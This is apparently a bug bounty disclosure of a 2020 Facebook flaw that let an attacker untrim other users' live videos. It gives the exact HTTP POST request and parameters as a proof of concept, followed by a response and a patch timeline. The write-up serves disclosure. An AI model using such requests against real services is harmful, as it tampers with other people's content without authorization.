(POC) Untrim any live video on Facebook

Description / Impact

It’s possible to untrim any live video on Facebook on behalf of the owners.

Impact

This could let a malicious user untrim any live video on Facebook using non GraphQL.

Proof Of Concept / Reprosteps

1. Obtain target live video ID
2. Submit the request with the value above (remember to update your CSRF token)

HTTP POST
/video_broadcast/trim/?new_start_seconds=0&new_end_seconds=99999999&reset_trimming=1&video_id=valueFromStep1&fb_dtsg=

Host: facebook.com

Response

{
“__ar”: 1,
“payload”: {},
“hsrp”: {
“hblp”: {
“sr_revision”: 1002775749,
“consistency”: {
“rev”: 1002775749
}

The target live video has been untrimed on behalf of the owners.

Timeline:

06/10/2020 : Report sent

Triaged by Facebook after 6 hours

10/10/2020: $2875 bounty awarded during BountyCon 2020 (with bonus)

21/10/2020: Patch confirmed by Facebook